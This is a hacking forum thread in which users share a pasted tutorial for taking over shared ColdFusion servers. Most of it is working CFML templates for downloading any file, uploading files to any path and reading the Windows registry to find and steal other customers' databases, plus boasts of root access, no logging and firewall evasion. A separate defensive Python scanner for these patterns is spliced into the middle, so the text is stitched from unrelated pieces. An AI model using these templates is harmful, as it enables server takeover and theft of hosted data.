hacking contest

hacking exploits security forum
ThEWaTcHeR
Hi folks, I am searching for a ColdFusion server exploit. Does anyone have something like this?

greetz Watcher
ThEWaTcHeR
I've found one, look here:

DOWNLOAD
Hyp3r
I have found this
Sorry, but I found nothing in English!
CODE
********************************
* 1. General INFO *
********************************
--------------------------------
1. The first basic requirement is an account with the
provider.
2. No log is kept during the takeover of the server; at
least I did not find anything.
3. Of course, this only works on CF servers.
4. After the takeover we have system root rights
...
-----------------------------------------------------------
***********************************************************
* 2. Let us take over this (filtered) server... *
***********************************************************
-----------------------------------------------------------
what do we need?
We need the following files:
(these cannot be modified because they were encrypted by
Allaire; this has minor consequences at a later point)
You can find these driver files under:
../cfide/administrator/datasources/drivers/
db2_unix.cfm
dbase.cfm
db2.cfm
dsnsecurity.cfm
excel.cfm
foxpro.cfm
informix_unix.cfm
informix73.cfm
jetoledb.cfm
msaccess.cfm
mssqlserver.cfm
odbc.cfm
oledb.cfm
openingres_unix.cfm
openingres2_unix.cfm
oracle_mircrosoft.cfm
oracle_unix.cfm
oracle_visigenic.cfm
oracle73.cfm
oracle8_unix.cfm
oracle80.cfm
paradox.cfm
registered_native_drivers.cfm
registered_oledb_Drivers.cfm
registreddrivers.cfm
sqloledb.cfm
sybase_unix.cfm
sybase11.cfm
text.cfm
text_unix.cfm
visualfoxpro.cfm
###########################
Download file from Server:#
###########################
We need the pages listed below (2)
------------
getfile.cfm-
------------
"---- start code ----"
"!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
Transitional//EN""
"html"
"head"
"title"Unbenannt"/title"
"/head"
"body"
"form action="fileaction.cfm" method="POST""
"input type="Text" name="logpath""
"input type="Submit" name="DownloadFile" value="Datei
downloaden""
"/form"
"/body"
"/html"
"----- end code ----"
The download form.
Well then, now we still need fileaction.cfm, where we
define the download:
---------------
fileaction.cfm-
---------------
"---- start code ----"
"CFCONTENT FILE="#LogPath#" DELETEFILE="No"" "!--- if yes
is given here, the file is deleted after the download
---"
"----- end code ----"
Now just call fileaction.cfm and you can download a
file ... give the path as follows,
e.g.: c:\winnt\system32\notepad.exe
Easy, right?
##########################################
Upload file to server... any destination:#
##########################################
We need the page listed below (1)
--------------------
putfiletoserver.cfm-
--------------------
"---- start code ----"
"!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
Transitional//EN""
"html"
"head"
"title"Upload file "/title"
"/head"
"body"
"form Action="putfiletoserver.cfm?upload=true"
enctype="multipart/form-data"
Method="Post" "
Upload file:"br"
"input Name= "gitsrulz" Type = "file""
destination:
"input type="Text" name="dest""
"br" "input type = "submit" Value="Upload"""/form"
"/body"
"/html"
"/td"
"/tr"
"/table"
"cfif isdefined ("upload")"
"cfif #upload# is "true""
"cffile
Action="Upload"
filefield="gitsrulz"
Nameconflict="overwrite"
destination="#form.dest#""
"/cfif""/cfif"
"/body"
"/html"
"----- end code ----"
Now just call putfiletoserver.cfm and you can upload a
file ... give the path as follows,
e.g.: c:\winnt\system32\notepad.exe
Easy, right?
#######################################
readout registry and or db ... hehe #
#######################################
1. It is assumed that the driver files listed under
point 2. Let us take over this (filtered) server...
are in the directory
'deinhost/drivers/'
of your account.
******************************************************************
*°~-_.: """ read out registered db from the winregistry
""" :._-~°*
******************************************************************
--------------------
getregistredDBs.cfm-
--------------------
"---- start code ----"
"META NAME="Author" CONTENT="Copyleft 2000
-fallen-angel-. No rights reserved.""
"META NAME="Version" CONTENT="$Revision: 43 $ $Modtime:
3:29p $""
"!----------------- Get all registered System ODBC data
sources. ---------------"
"CFIF #Server.OS.Name# IS NOT "UNIX""
"CFNewInternalRegistry ACTION=SET
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC"
ENTRY="ODBC.INI" TYPE="KEY""
"CFNewInternalRegistry ACTION=SET
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC"
ENTRY="ODBCINST.INI" TYPE="KEY""
"CFNewInternalRegistry ACTION=SET
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI"
ENTRY="ODBC Data Sources" TYPE="KEY""
"CFNewInternalRegistry ACTION=SET
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI"
ENTRY="ODBC Drivers" TYPE="KEY""
"CFPARAM Name="Sort" Default="Entry""
"CFNewInternalRegistry ACTION=GETALL NAME="DS_List"
TYPE="ANY" SORT="#Sort#"
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC
Data Sources""
"CFNewInternalRegistry ACTION=GETALL NAME="Drivers"
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI\ODBC
Drivers""
"CFELSE"
"CFSET DS_List = cfusion_getodbcdsn()"
"/CFIF"
"CFSET Method = "GetValidDrivers"""!---Loads the Driver
data ---"
"CFINCLUDE TEMPLATE="getdriverinfo.cfm""
"a href="drivers/dsnsecurity.cfm"""/a"
"HTML"
"HEAD""TITLE"ColdFusion Administrator -
ODBC-Datenquellen"/TITLE""/HEAD"
"LINK Rel="Stylesheet" Type="text/css"
Href="../TableDataStylesheet.css""
"FORM Action="index.cfm" Method="post""
"TABLE Width=100%""TR""TD"
"/TD""TD Align=right"
"INPUT Type="Hidden" Name="VerifyList" Value="All""
"INPUT Type="Submit" Value="Alle überprüfen""
"/TD""/TR""/TABLE"
"/FORM"
"FORM ACTION="editdsinfo.cfm" METHOD="post""
"TABLE BORDER=0 CELLSPACING=0 CELLPADDING=3
WIDTH="100%""
"TR BGCOLOR="#669966""
"CFOUTPUT"
"TD ALIGN="Left" VALIGN="Top""
"FONT SIZE="2" COLOR="##FFFFFF"""B"
"A Href="index.cfm?sort=Entry"CFIF
IsDefined("VerifyList")"&VerifyList=#URLEncodedFormat(VerifyList)#"/cfif""
Style="color:white;text-decoration:none;""Name der Datenquelle"/a"
"/B""/FONT"
"/TD"
"TD ALIGN="Left" VALIGN="Top""
"FONT SIZE="2" COLOR="##FFFFFF"""B"
"A Href="index.cfm?sort=Value"CFIF
IsDefined("VerifyList")"&VerifyList=#URLEncodedFormat(VerifyList)#"/cfif""
Style="color:white;text-decoration:none;""ODBC-Treiber"/a"
"/B""/FONT"
"/TD"
"TD ALIGN="Left" VALIGN="Top"""FONT SIZE="2"
COLOR="##FFFFFF"""B"Überprüfen"/B""/FONT""/TD"
"CFIF IsDefined("VerifyList")"
"TD ALIGN="Left" VALIGN="Top"""FONT SIZE="2"
COLOR="##FFFFFF"""B"Status"/B""/FONT""/TD"
"/CFIF"
"/CFOUTPUT"
"/TR"
"CFIF ParameterExists(DoNotShowNewDSForm) IS "No""
"!---- Show the new DS form in the table only if a data
source is not being added or updated ----"
"TR"
"TD ALIGN="Left" VALIGN="Top" NOWRAP Class="Data""
"FONT SIZE="-1" FACE="Arial"""INPUT TYPE="TEXT"
NAME="NewDSN" VALUE="""" SIZE=20""/FONT"
"/TD"
"TD ALIGN="Left" VALIGN="Top" NOWRAP Class="Data""
"FONT SIZE="-1" FACE="Arial""
"CFSET iIndex = 0"
"SELECT NAME="DS_CFDriverFile""
"CFLOOP INDEX="iDriverName"
LIST="#GVD_RegisteredDrivers#" DELIMITERS=",""
"CFSET iIndex = iIndex + 1"
"CFOUTPUT""OPTION VALUE="#iDriverName#""
#ListGetAt(GVD_DriverNames,iIndex)#"/CFOUTPUT"
"/CFLOOP"
"/SELECT"
"INPUT TYPE="SUBMIT" NAME="AddDSWasPressed" VALUE="
Hinzufügen... ""
"/TD"
"TD Class="Data"CFIF NOT
IsDefined("VerifyList")"NoBorder"/cfif""" "/td"
"CFIF IsDefined("VerifyList")""TD Class="DataNoBorder""
"/td""/cfif"
"/TR"
"/CFIF"
"CFSET RowCount = 0"
"CFOUTPUT Query="DS_List""
"CFIF #Server.OS.Name# IS "UNIX""
"CFSET Entry=Name"
"CFSET Value=Description"
"CFSET Type="STRING""
"/CFIF"
"CFSET RowCount = IncrementValue(RowCount)"
"TR""CFIF RowCount / 2 is Int(RowCount / 2)"
BGColor="##EEEEEE""/cfif"
"TD ALIGN="Left" VALIGN="Top" Class="Data"""A
HREF="editdsinfo.cfm?EditLinkWasPressed=Yes&OriginalDSN=#URLEncodedFormat(Entry)#"""
B"#Entry#"/B""/A""/TD"
"TD ALIGN="Left" VALIGN="Top" Class="Data""#Value#"/TD"
"TD ALIGN="Left" VALIGN="Top" Class="Data"CFIF NOT
IsDefined("VerifyList")"NoBorder"/cfif""""A
Href="verifyds.cfm?VerifyDSName=#URLEncodedFormat(Entry)#""Überprüfen"/A""/TD"
"CFIF IsDefined("VerifyList")"
"TD ALIGN="Left" VALIGN="Top" Class="DataNoBorder""
"CFIF VerifyList is "All" OR ListFind(VerifyList,
Entry)"
"CFIF
CF_IsColdFusionDatasource(Entry)"Verifiziert"CFELSE""FONT
Color="Red""Fehlgeschlagen"/FONT""/CFIF"
"CFELSE"

Continued on page two.

---------------------------------------------------

Continuation:

"/cfif"
"/TD"
"/cfif"
"/TR"
"/CFOUTPUT"
"/TABLE"
"/FORM"
"/BODY"
"/HTML"
"---- end code ----"
--------------------
getdriverinfo.cfm -
--------------------
"---- start code ----"
"CFIF Method IS "GetValidDrivers""
"CFSET ValidDrivers = """
"CFSET GVD_DriverNames = """
"!--- Load the Driver file names. The include below
creates InstalledCFDriverFiles list---"
"CFINCLUDE TEMPLATE="drivers/registereddrivers.cfm""
"CFLOOP INDEX="DriverFile"
LIST="#InstalledCFDriverFiles#" DELIMITERS=",""
"!---- Check for the existence of the files to avoid
unnecessary errors ----"
"CFIF FileExists(ExpandPath("drivers/#DriverFile#"))"
"!---- Run the GetDriver method to retrieve DriverName
and DriverInstalled ----"
"CFSET Method = "GetDriverInfo""
"CFINCLUDE TEMPLATE="drivers/#DriverFile#""
"!------ Add the driver info only if properly installed
-------"
"CFIF GDI_ODBCDriverInstalled IS "Yes""
"CFSET ValidDrivers = ListAppend(ValidDrivers,
#DriverFile#)"
"CFSET GVD_DriverNames = ListAppend(GVD_DriverNames,
#GDI_CFDriverName#)"
"/CFIF"
"/CFIF"
"/CFLOOP"
"!--- Copy the ValidDrivers list into the original
GVD_RegisteredDrivers list. This
will leave only the properly registered drivers.---"
"CFSET GVD_RegisteredDrivers = ValidDrivers"
"/CFIF"
"!------------------------------ Method: GetCFDriverInfo
-------------------
Returns driver information on a specific CF-to-ODBC
driver based on
a parameter passed in GetInfoOnDriverFile. Method
returns:
CFDriverFile - The name of the CF-to-ODBC driver file.
CFDriverName - The name of the CF-to-ODBC driver file.
CFDriverInstalled - Flags whether the CF driver is
present on the server.
ODBCDriverName - The name of the corresponding ODBC
driver.
ODBCDriverInstalled - Flags whether the corresponding
ODBC driver is present on the server.
------------------------------------------------------------------------------"
"CFIF Method IS "GetCFDriverInfo""
"CFSET CFDriverFile = #GetInfoOnDriverFile#"
"CFIF
FileExists(ExpandPath("drivers/#GetInfoOnDriverFile#"))"
"!---- Run the GetDriver method to retrieve DriverName
and DriverInstalled ----"
"CFSET Method = "GetDriverInfo""
"CFINCLUDE TEMPLATE="drivers/#GetInfoOnDriverFile#""
"CFSET GCFDI_CFDriverName = "#GDI_CFDriverName#""
"CFSET GCFDI_CFDriverInstalled = "Yes""
"CFSET GCFDI_ODBCDriverName = "#GDI_ODBCDriverName#""
"CFSET GCFDI_ODBCDriverInstalled =
"#GDI_ODBCDriverInstalled#""
"CFELSE"
"!--- The CF Driver is not present on the server ---"
"CFSET GCFDI_CFDriverName = """
"CFSET GCFDI_CFDriverInstalled = "No""
"CFSET GCFDI_ODBCDriverName = """
"CFSET GCFDI_ODBCDriverInstalled = """
"/CFIF"
"/CFIF"
"!------------------------------ Method:
GetDataSourceInfo -------------------
Returns driver information on a specific ODBC datasource
based on
a parameter passed in GetInfoOnDataSourceName. Method
returns:
GDSI_CFDriverFile - The name of the CF-to-ODBC driver
file.
GDSI_CFDriverName - The name of the CF-to-ODBC driver
file.
GDSI_CFDriverInstalled - Flags whether the CF driver is
present on the server.
GDSI_ODBCDriverName - The name of the corresponding ODBC
driver.
GDSI_ODBCDriverInstalled - Flags whether the
corresponding ODBC driver is present on the server.
------------------------------------------------------------------------------"
"CFIF Method IS "GetDataSourceInfo""
"!-----Let us find the ODBC driver name for this data
source ----"
"CFIF #Server.OS.Name# IS "UNIX""
"CFSET GetInfoOnODBCDriver = cfusion_getodbcini("ODBC
Data Sources", "#GetInfoOnDataSourceName#", "default")"
"CFELSE"
"CFNewInternalRegistry ACTION=GET
VARIABLE="GetInfoOnODBCDriver"
BRANCH ="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI\ODBC
Data Sources"
ENTRY ="#GetInfoOnDataSourceName#"
TYPE ="STRING""
"/CFIF"
"CFPARAM NAME="ODBCDriverName" DEFAULT="""
"CFIF ParameterExists(GetInfoOnODBCDriver) IS "No""
"!--- Data source was not found ----"
"CFSET GDSI_CFDriverFile = """
"CFSET GDSI_CFDriverName = """
"CFSET GDSI_CFDriverInstalled = "No""
"CFSET GDSI_ODBCDriverName = """
"CFSET GDSI_ODBCDriverInstalled = "No""
"CFELSE"
"!---- Scan through the CF Driver files and find
corresponding CF driver is available ---"
"CFSET bDriverFound = "No""
"!--- Load the Driver file names. The include below
creates GVD_RegisteredDrivers list---"
"CFINCLUDE TEMPLATE="drivers/registereddrivers.cfm""
"CFLOOP INDEX="DriverFile"
LIST="#InstalledCFDriverFiles#" DELIMITERS=",""
"!---- Check for the existence of the files to avoid
unnecessary errors ----"
"CFIF FileExists(ExpandPath("drivers/#DriverFile#"))"
"!---- Run the GetDriverInfo method to retrieve info on
the CF driver----"
"CFSET Method = "GetDriverInfo""
"CFINCLUDE TEMPLATE="drivers/#DriverFile#""
"!------ If ODBCDriverName matches
GetInfoOnDataSourceName we got the baby -------"
"!--- The ODBC driver matches that of a CF driver.
Return final data ----"
"CFSET GDSI_CFDriverFile = "#DriverFile#""
"CFSET GDSI_CFDriverName = "#GDI_CFDriverName#""
"CFSET GDSI_CFDriverInstalled = "Yes""
"CFSET GDSI_ODBCDriverName = "#GDI_ODBCDriverName#""
"CFSET GDSI_ODBCDriverInstalled =
"#GDI_ODBCDriverInstalled#""
"CFSET bDriverFound = "Yes""
"/CFIF"
"/CFIF"
"/CFLOOP"
"CFIF bDriverFound IS "No""
"!---- We did not find the CF driver in the loop---"
"CFSET GDSI_CFDriverFile = """
"CFSET GDSI_CFDriverName = """
"CFSET GDSI_CFDriverInstalled = "No""
"CFSET GDSI_ODBCDriverName = "#GetInfoOnODBCDriver#""
"CFSET GDSI_ODBCDriverInstalled = """
"/CFIF"
"/CFIF"
"/CFIF"
"--- end code ---"
When you open the page getregistredDBs.cfm you get
all registered database names!
If you now click on a DB, e.g. cfsnippets,
the second page is loaded and at the top you get
the path where the DB is located...
Right below this information you get the following
error message:
%%%%%%
Error Diagnostic Information
Error resolving parameter ENFORCEADMINSECURITY
Cold Fusion was unable to determine the value of the
parameter. This problem is very likely due to the fact
that either:
You have misspelled the parameter name, or
You have not specified a QUERY attribute for a CFOUTPUT,
CFMAIL, or CFTABLE tag.
The error occurred while evaluating the expression:
NOT #enforceAdminSecurity# OR
isAuthorized("UserObject","CFAdministrator")
%%%%%%%
This is a security check that is built into the encrypted
driver templates, as described above under general info ...
Nevertheless that does not matter, since we can now simply
download the DB and open it ... now we can create,
e.g., a query, update or insert form on our account
and manipulate the DB online. Well, the good thing about
it: the DB is not in our directory, LOL, and we still have
access..
############
#firewalls?#
############
if there is a firewall ... let em be .. *ggg*
the firewall will always let us in if u have a ftp
account at the cf server.. legal or illegal it doesn't
matter ...
########
logged?#
########
I can't find any logfiles where my action was logged
...
maybe cause u operate as system root
#############
DOS with CF?#
#############
Most DoS bugs are already fixed. To get the sources of
CF DOS goto:
http://gits-search.virtualave.net and choose the
packetstorm engine and type as keyword CF DOS
##############################
read out other registry keys?#
##############################
same as u get the db
("CFNewInternalRegistry ACTION=SET
BRANCH="HKEY_LOCAL_MACHINE\SOFTWARE\ODBC"
ENTRY="ODBC.INI" TYPE="KEY"")
just change the regKey from the ODBC for ex.: to WININI
in the getregistredDBs.cfm file
I love to mix English with German
#########
Allaire?#
#########
sux
#####################
How to fix sec hole?#
#####################
hmm .. I finally do not know, maybe impossible for admins

depends on Allaire, they must update their software
so then cu .. and happy hacking or whatever ...
-fallen-angel-
(faster as time)
++++++++++++++++++
+****************+
+* 3. greetings *+
+****************+
++++++++++++++++++
greetings to (groups):
euroarmy.org (irc channel #hackerattack, irc.dal.net,
port:7000)
2600.com
MiLwOrm
L0pth
hackerattack.com
scheiterhaufen.net, org, com
special greetings to:
---------------------
massa mastur, hard pete, solaris, fantomas, me and to
our cat Herr Miggi
greetings to:
-------------
Helic, CHiCoSTo, cybermaXX, axall+, LordAidan, Eternal,
[XpL]Raptor and all other euroarmy/gits-network members.
lovely greetings to:!


Grezz
Hyp3r
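
Added example (not part of the thread or of the quoted text file): a defender-side scan of shared-hosting webroots for the template patterns the post relies on, namely a variable reaching CFCONTENT FILE or CFFILE DESTINATION, registry tags, and Administrator driver templates copied outside the Administrator directory. The rule names, the `cfide` directory default and the sample templates are assumptions made for the illustration.

```python
import os
import re

# Patterns from the templates quoted above: a request-supplied variable reaching
# CFCONTENT FILE= or CFFILE DESTINATION=, and any registry tag.
RULES = [
    ("cfcontent-variable-file",
     re.compile(r'<\s*cfcontent\b[^>]*\bfile\s*=\s*"[^"]*#[^"#]+#', re.I)),
    ("cffile-variable-destination",
     re.compile(r'<\s*cffile\b[^>]*\bdestination\s*=\s*"[^"]*#[^"#]+#', re.I)),
    ("registry-tag",
     re.compile(r'<\s*cf(?:newinternal)?registry\b', re.I)),
]
# Administrator driver templates named in the post; a copy in a customer
# directory is worth a look.
ADMIN_TEMPLATES = {"dsnsecurity.cfm", "registereddrivers.cfm"}


def scan_template(text):
    """Return sorted (line_number, rule_name) findings for one CFML source."""
    findings = []
    for name, pattern in RULES:
        for m in pattern.finditer(text):
            findings.append((text.count("\n", 0, m.start()) + 1, name))
    return sorted(findings)


def scan_webroot(root, admin_dir="cfide"):
    """Scan .cfm files under root, skipping the Administrator's own directory."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() != admin_dir]
        for fn in filenames:
            if not fn.lower().endswith(".cfm"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="latin-1") as fh:
                hits = scan_template(fh.read())
            if fn.lower() in ADMIN_TEMPLATES:
                hits.append((0, "admin-template-copy"))
            if hits:
                report[path] = hits
    return report


# Constructed sample templates (not taken from a real site).
SAMPLE_FLAGGED = '''<cfif isdefined("upload")>
<cffile action="upload"
        filefield="f"
        destination="#form.dest#">
</cfif>
<cfcontent file="#LogPath#" deletefile="No">
'''
SAMPLE_CLEAN = '<cfcontent type="text/plain" file="d:\\site\\report.txt">\n'
```

A finding is a prompt for review, not proof of abuse: a template may legitimately serve a file whose path is built from a validated value.
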
ThEWaTcHeR
German is fine too *gg*

(my native language)

Many thanks